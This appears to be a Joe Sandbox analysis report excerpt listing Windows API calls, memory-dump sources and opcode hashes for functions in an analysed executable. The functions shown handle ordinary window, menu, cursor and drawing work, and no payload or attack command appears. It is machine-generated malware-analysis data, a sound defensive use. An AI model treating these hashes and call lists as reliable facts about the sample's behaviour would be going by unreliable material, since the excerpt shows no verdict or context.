                                                                • Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09
                                                              • GetParent.USER32(?), ref: 004E8853
                                                              • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 004E8874
                                                              • GetWindowRect.USER32(?,?), ref: 004E8893
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 004E88C5
                                                              • MonitorFromWindow.USER32(00000000,00000001), ref: 004E88F9
                                                              • GetMonitorInfoW.USER32(00000000), ref: 004E8900
                                                              • CopyRect.USER32(?,?), ref: 004E8914
                                                              • CopyRect.USER32(?,?), ref: 004E891E
                                                              • GetWindowRect.USER32(00000000,?), ref: 004E8927
                                                              • MonitorFromWindow.USER32(00000000,00000002), ref: 004E8934
                                                              • GetMonitorInfoW.USER32(00000000), ref: 004E893B
                                                              • CopyRect.USER32(?,?), ref: 004E8949
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Monitor$Copy$FromInfoLong$MessageParentSend
                                                              • String ID: (
                                                              • API String ID: 783970248-3887548279
                                                              • Opcode ID: 0d5e30d95529278a78cdf6573bc7fbfa5234b2c1f4fbaba9212562d5ee7e1387
                                                              • Instruction ID: 1bcc04c9839b12d6a21119fd2c6ce1f6c0032dbb17d252781eb676bd1d10de62
                                                              • Opcode Fuzzy Hash: 0d5e30d95529278a78cdf6573bc7fbfa5234b2c1f4fbaba9212562d5ee7e1387
                                                              • Instruction Fuzzy Hash: AC611DB1D00219ABCF10DFA9DD889EEBBB9FF48711F14451AE505F3251CB74A905CBA4
                                                              APIs
                                                              • GetParent.USER32(?), ref: 0052F7AE
                                                              • GetSystemMenu.USER32(?,00000000,?,00000000,?,?,?,0052FE6E,?), ref: 0052F7CD
                                                              • SetMenuDefaultItem.USER32(?,0000F060,00000000,00000000,?,?,?,0052FE6E,?), ref: 0052F7F6
                                                              • GetParent.USER32(?), ref: 0052F7FF
                                                              • IsZoomed.USER32(?), ref: 0052F80A
                                                              • EnableMenuItem.USER32(?,0000F000,00000003), ref: 0052F824
                                                              • EnableMenuItem.USER32(?,0000F010,00000003), ref: 0052F830
                                                              • EnableMenuItem.USER32(?,0000F030,00000003), ref: 0052F83C
                                                                • Part of subcall function 004EAB9B: GetParent.USER32(?), ref: 004EABA5
                                                              • EnableMenuItem.USER32(?,0000F120,00000003), ref: 0052F84F
                                                              • EnableMenuItem.USER32(?,0000F000,00000000), ref: 0052F85B
                                                              • EnableMenuItem.USER32(?,0000F010,00000000), ref: 0052F867
                                                              • EnableMenuItem.USER32(?,0000F030,00000000), ref: 0052F873
                                                              • GetParent.USER32(?), ref: 0052F87B
                                                              • DeleteMenu.USER32(?,0000F120,00000000,00000000,?,?,?,0052FE6E,?), ref: 0052F8A1
                                                              • DeleteMenu.USER32(?,0000F030,00000000,?,?,?,0052FE6E,?), ref: 0052F8AD
                                                              • GetParent.USER32(?), ref: 0052F8B5
                                                              • DeleteMenu.USER32(?,0000F020,00000000,00000000,?,?,?,0052FE6E,?), ref: 0052F8D5
                                                              • GetParent.USER32(?), ref: 0052F8E7
                                                              • TrackPopupMenu.USER32(?,00000004,0052FE6E,6AFFFFFF,00000000,?,00000000), ref: 0052F932
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$Enable$Parent$Delete$DefaultPopupSystemTrackZoomed
                                                              • String ID:
                                                              • API String ID: 4239930045-0
                                                              • Opcode ID: 821585ffef9f15ced5bf6f94bf641b3472522eb44beeec0b7b5d85af8ad14f9d
                                                              • Instruction ID: 4209143267905a4e8dfdcf6c2993b13c696b48d8b6d6bdbd2511925a8dd1fc05
                                                              • Opcode Fuzzy Hash: 821585ffef9f15ced5bf6f94bf641b3472522eb44beeec0b7b5d85af8ad14f9d
                                                              • Instruction Fuzzy Hash: CB417031240214BFEB316BA2ED46F2A7A69FF89B04F110434F244AB5E1CA75EC10EB14
                                                              APIs
                                                              • GetCapture.USER32 ref: 0052669F
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0052670D
                                                              • SetCursor.USER32(00000000), ref: 00526714
                                                              • SetRectEmpty.USER32(?), ref: 0052672D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Cursor$CaptureEmptyLoadRect
                                                              • String ID: 83`
                                                              • API String ID: 2438408-1826646354
                                                              • Opcode ID: 9f5180f58fee38d4962d63de95a5b863b993410ca3bea96d06fca1b8cc89f8c2
                                                              • Instruction ID: 3c508d2b0666aad0a19e3983c14c86323bf9f5bdc64c3fba7e5a0913c163abf8
                                                              • Opcode Fuzzy Hash: 9f5180f58fee38d4962d63de95a5b863b993410ca3bea96d06fca1b8cc89f8c2
                                                              • Instruction Fuzzy Hash: BFA14A71E002299FCF05EFE8D9889AEBBF6FF49300F14442AE805EB254DB75A945CB50
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 005438F0
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00543957
                                                              • GetObjectW.GDI32(006051CC,00000018,000000FF), ref: 00543975
                                                              • SelectObject.GDI32(?,006051CC), ref: 005439B3
                                                              • CreateCompatibleDC.GDI32(?), ref: 005439D1
                                                              • CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00543A27
                                                              • SelectObject.GDI32(?,?), ref: 00543A3C
                                                              • SelectObject.GDI32(?,00000000), ref: 00543A52
                                                              • SelectObject.GDI32(?,?), ref: 00543A61
                                                              • DeleteObject.GDI32(?), ref: 00543A68
                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00543ABA
                                                              • GetPixel.GDI32(?,?,00000000), ref: 00543B82
                                                              • SetPixel.GDI32(?,?,00000000,?), ref: 00543B97
                                                              • SelectObject.GDI32(?,?), ref: 00543BB4
                                                              • SelectObject.GDI32(?,?), ref: 00543BBC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Object$Select$Create$CompatiblePixel$DeleteH_prolog3_Section
                                                              • String ID: (
                                                              • API String ID: 1942225872-3887548279
                                                              • Opcode ID: c49ee3608b3d971deb8ef63b288514ebe193aae0c702dd241a08c8f08562374f
                                                              • Instruction ID: d44eb23c5504d44220c0c7330fbe00781b34c6b67a672f93cb94ea1bd4037e8e
                                                              • Opcode Fuzzy Hash: c49ee3608b3d971deb8ef63b288514ebe193aae0c702dd241a08c8f08562374f
                                                              • Instruction Fuzzy Hash: B0A1F071C00218DFDF21EFA5C885AEDBBB5FF18318F20462AE556A72A1DB705A46DF10
                                                              APIs
                                                                • Part of subcall function 004D94E4: ActivateActCtx.KERNEL32(?,?,0062BB48,00000010,004D95B9,KERNEL32.DLL), ref: 004D9504
                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 004DD577
                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeTextEx), ref: 004DD58A
                                                              • GetProcAddress.KERNEL32(00000000,BeginBufferedPaint), ref: 004DD59D
                                                              • GetProcAddress.KERNEL32(00000000,EndBufferedPaint), ref: 004DD5B0
                                                              • GetProcAddress.KERNEL32(00000000,DwmExtendFrameIntoClientArea), ref: 004DD5FA
                                                              • GetProcAddress.KERNEL32(00000000,DwmDefWindowProc), ref: 004DD60D
                                                              • GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 004DD620
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Activate
                                                              • String ID: BeginBufferedPaint$DrawThemeParentBackground$DrawThemeTextEx$DwmDefWindowProc$DwmExtendFrameIntoClientArea$DwmIsCompositionEnabled$EndBufferedPaint$UxTheme.dll$dwmapi.dll
                                                              • API String ID: 2388279185-3875329446
                                                              • Opcode ID: a7ba1b6913164b23a3ebd236e7a8e37240d63029300f1984297ca8150697f89e
                                                              • Instruction ID: 3f7de8aff36ee99be8f01b5b5a9a0c1d816747a4395b3412d2a17bb8b7b55e94
                                                              • Opcode Fuzzy Hash: a7ba1b6913164b23a3ebd236e7a8e37240d63029300f1984297ca8150697f89e
                                                              • Instruction Fuzzy Hash: 7A2141B1940B469BC7216F758C58AEBFFE4FF85704F01483FE5BA93251C6786441CA94
                                                              APIs
                                                              • KillTimer.USER32(?,00000001), ref: 00563879
                                                              • KillTimer.USER32(?,00000002), ref: 00563880
                                                              • IsWindow.USER32(?), ref: 005638D0
                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005638ED
                                                              • GetCursorPos.USER32(?), ref: 0056392A
                                                              • ScreenToClient.USER32(?,?), ref: 00563937
                                                              • KillTimer.USER32(?,00000001), ref: 0056394C
                                                              • PtInRect.USER32(?,?,?), ref: 0056397B
                                                              • KillTimer.USER32(?,00000002), ref: 005639F0
                                                              • GetParent.USER32(?), ref: 00563A05
                                                              • PtInRect.USER32(?,?,?), ref: 00563A30
                                                              • KillTimer.USER32(?,00000014), ref: 00563A7E
                                                              • GetClientRect.USER32(?,?), ref: 00563A97
                                                              • PtInRect.USER32(?,?,?), ref: 00563AA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: KillTimer$Rect$Client$CursorMessageParentPostScreenWindow
                                                              • String ID: <L`
                                                              • API String ID: 2803392424-3276711095
                                                              • Opcode ID: d1e07a42febd3d8994aaf3057bcdbd257b3a0b251deae2eecb5773892e1c220f
                                                              • Instruction ID: 60a1328ea751b992665af8faeb8ec0a16d460bfa94ce905cb36791d97d0f26d6
                                                              • Opcode Fuzzy Hash: d1e07a42febd3d8994aaf3057bcdbd257b3a0b251deae2eecb5773892e1c220f
                                                              • Instruction Fuzzy Hash: E3718B31600604DFCB219FA4CC88ABEBBB6FF84304F20452EF546D7260DB75AA45EB51
                                                              APIs
                                                              • InflateRect.USER32(?,00000004,00000004), ref: 0050C077
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 0050C089
                                                              • UpdateWindow.USER32(?), ref: 0050C092
                                                              • GetMessageW.USER32(?,00000000,0000000F,0000000F), ref: 0050C0D1
                                                              • DispatchMessageW.USER32(?), ref: 0050C0DF
                                                              • PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0050C0ED
                                                              • GetCapture.USER32 ref: 0050C0F9
                                                              • SetCapture.USER32(?), ref: 0050C105
                                                              • GetCapture.USER32 ref: 0050C111
                                                              • GetWindowRect.USER32(?,?), ref: 0050C13B
                                                              • SetCursorPos.USER32(?,?), ref: 0050C15E
                                                              • GetCapture.USER32 ref: 0050C164
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050C17C
                                                              • DispatchMessageW.USER32(?), ref: 0050C1A2
                                                              • ReleaseCapture.USER32 ref: 0050C1E0
                                                              • IsWindow.USER32(?), ref: 0050C1E9
                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 0050C202
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Message$Capture$RectWindow$Dispatch$CursorInflateInvalidatePeekReleaseSendUpdate
                                                              • String ID:
                                                              • API String ID: 4077352625-0
                                                              • Opcode ID: 0dc8509b583c78fdee2e43dbfda94e1a2c37527501832c909e2bed4ed79bd0d8
                                                              • Instruction ID: 75db84903a31a952dfb5f8b0bba3525019da948d49658ba5a09f33ff585e674b
                                                              • Opcode Fuzzy Hash: 0dc8509b583c78fdee2e43dbfda94e1a2c37527501832c909e2bed4ed79bd0d8
                                                              • Instruction Fuzzy Hash: 76916C72A00209AFCB14EFE5DC88DBE7FB9FB0A314B14062AF501E7691DA35AD44CB55
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 005134C9
                                                              • CreateRectRgnIndirect.GDI32(?), ref: 00513506
                                                              • CopyRect.USER32(?,?), ref: 0051351C
                                                              • InflateRect.USER32(?,?,?), ref: 00513532
                                                              • IntersectRect.USER32(?,?,?), ref: 00513540
                                                              • CreateRectRgnIndirect.GDI32(?), ref: 0051354A
                                                              • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0051355F
                                                                • Part of subcall function 00500174: CombineRgn.GDI32(?,00000003,?,?), ref: 00500199
                                                              • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 005135C7
                                                              • SetRectRgn.GDI32(?,0000000A,?,?,?), ref: 005135E4
                                                              • CopyRect.USER32(?,0000000A), ref: 005135EF
                                                              • InflateRect.USER32(?,?,?), ref: 00513605
                                                              • IntersectRect.USER32(?,?,0000000A), ref: 00513611
                                                              • SetRectRgn.GDI32(?,?,?,?,0000000A), ref: 00513626
                                                              • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00513652
                                                                • Part of subcall function 00513324: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,0051358B), ref: 0051336D
                                                                • Part of subcall function 00513324: CreatePatternBrush.GDI32(00000000), ref: 0051337A
                                                                • Part of subcall function 00513324: DeleteObject.GDI32(00000000), ref: 00513386
                                                                • Part of subcall function 004E06C9: SelectObject.GDI32(?,00000000), ref: 004E06EF
                                                                • Part of subcall function 004E06C9: SelectObject.GDI32(?,?), ref: 004E0705
                                                              • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 005136C3
                                                              • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00513718
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3_Pattern
                                                              • String ID:
                                                              • API String ID: 3107162742-0
                                                              • Opcode ID: bdabad7bbf3ee83a07ec83b9f75fcb07e4071d966ff1aeab1b79db1721f789ac
                                                              • Instruction ID: 6ad78d851a6a86727835f233777e04676cb00fecf49c04d7218ea8167e88ac31
                                                              • Opcode Fuzzy Hash: bdabad7bbf3ee83a07ec83b9f75fcb07e4071d966ff1aeab1b79db1721f789ac
                                                              • Instruction Fuzzy Hash: 99A111B1A00109AFDF05EFE4D899EFEBBB9BF58300F14401AF506E2251DB789A45DB64
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000201,00000201,00000001), ref: 0052C82B
                                                              • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 0052C848
                                                              • ReleaseCapture.USER32 ref: 0052C883
                                                              • GetMessageW.USER32(?,00000000,000000A1,000000A1), ref: 0052C892
                                                              • PeekMessageW.USER32(?,00000000,?,?,00000001), ref: 0052C8A6
                                                              • DispatchMessageW.USER32(?), ref: 0052C8AD
                                                              • DispatchMessageW.USER32(?), ref: 0052C958
                                                              • GetCursorPos.USER32(?), ref: 0052C962
                                                              • PeekMessageW.USER32(?,00000000,?,?,00000001), ref: 0052C983
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Message$Peek$Dispatch$CaptureCursorReleaseSend
                                                              • String ID:
                                                              • API String ID: 597789953-0
                                                              • Opcode ID: 24616ccb760b50caf67be8b66a28cfd41054b18f0b047203e09358baf0c37759
                                                              • Instruction ID: 764ee34c6dc80eb710e1e2e7781a4023e20a2a3e3905e3e6e52c78ef2dbc55f4
                                                              • Opcode Fuzzy Hash: 24616ccb760b50caf67be8b66a28cfd41054b18f0b047203e09358baf0c37759
                                                              • Instruction Fuzzy Hash: 8451BF71600621BBEB246B64EC88EBF7EACFF47700F204815F542D21D2C675E984DB61
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 00543706
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0054373C
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00543753
                                                              • SelectObject.GDI32(?,?), ref: 0054377F
                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 005437A1
                                                              • SelectObject.GDI32(?,00000000), ref: 005437B4
                                                              • CreateCompatibleDC.GDI32(?), ref: 005437C7
                                                              • SelectObject.GDI32(?,?), ref: 005437D8
                                                              • SelectObject.GDI32(?,00000000), ref: 005437E9
                                                              • DeleteObject.GDI32(?), ref: 005437EE
                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0054381A
                                                              • GetPixel.GDI32(?,?,?), ref: 00543839
                                                              • SetPixel.GDI32(?,?,?,00000000), ref: 00543880
                                                              • SelectObject.GDI32(?,?), ref: 005438A4
                                                              • SelectObject.GDI32(?,00000000), ref: 005438AC
                                                              • DeleteObject.GDI32(?), ref: 005438B4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Object$Select$CompatibleCreate$DeletePixel$BitmapH_prolog3
                                                              • String ID:
                                                              • API String ID: 3639146769-0
                                                              • Opcode ID: 8f68030c8136408c88369e510db9fabd7226993361366ef95cd6567c6fd57438
                                                              • Instruction ID: 516c2891fc8165f6ca1490a264af96127eb681c0344c32dfc2b89dae2ce05f15
                                                              • Opcode Fuzzy Hash: 8f68030c8136408c88369e510db9fabd7226993361366ef95cd6567c6fd57438
                                                              • Instruction Fuzzy Hash: 0D511371801249EFCF26EFA1CD49AEEBF72FF54314F20452AF411A21A0DB355A56EB60
                                                              APIs
                                                              • IsWindow.USER32(?), ref: 0056356B
                                                              • GetCursorPos.USER32(?), ref: 0056358A
                                                              • ScreenToClient.USER32(?,?), ref: 00563597
                                                              • GetParent.USER32(?), ref: 0056363A
                                                              • SetTimer.USER32(?,00000002,FFFFFFFE,00000000), ref: 00563693
                                                              • InvalidateRect.USER32(?,000000AB,00000001), ref: 005636A2
                                                              • UpdateWindow.USER32(?), ref: 005636AB
                                                              • KillTimer.USER32(00000002,00000002,00000000), ref: 005636B8
                                                              • KillTimer.USER32(?,00000002), ref: 0056376E
                                                              • GetParent.USER32(?), ref: 00563789
                                                              • GetParent.USER32(?), ref: 005637DF
                                                              • SendMessageW.USER32(?,0000011F,00000000,?), ref: 0056385B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ParentTimer$KillWindow$ClientCursorInvalidateMessageRectScreenSendUpdate
                                                              • String ID: <L`
                                                              • API String ID: 2010726786-3276711095
                                                              • Opcode ID: 32410a25fcca2494592dc81f77cd7559528a35aee988a274b2f72dc137e03f82
                                                              • Instruction ID: acfca8476c5ebdb07b8527bee1489b4f95f34ef4a4ae6337786a36f3e7a98e69
                                                              • Opcode Fuzzy Hash: 32410a25fcca2494592dc81f77cd7559528a35aee988a274b2f72dc137e03f82
                                                              • Instruction Fuzzy Hash: 34919EB1A00301AFDF249FA1C888BA97FB5FF44314F14456DE9469B2A1DB35EE80DB50
                                                              APIs
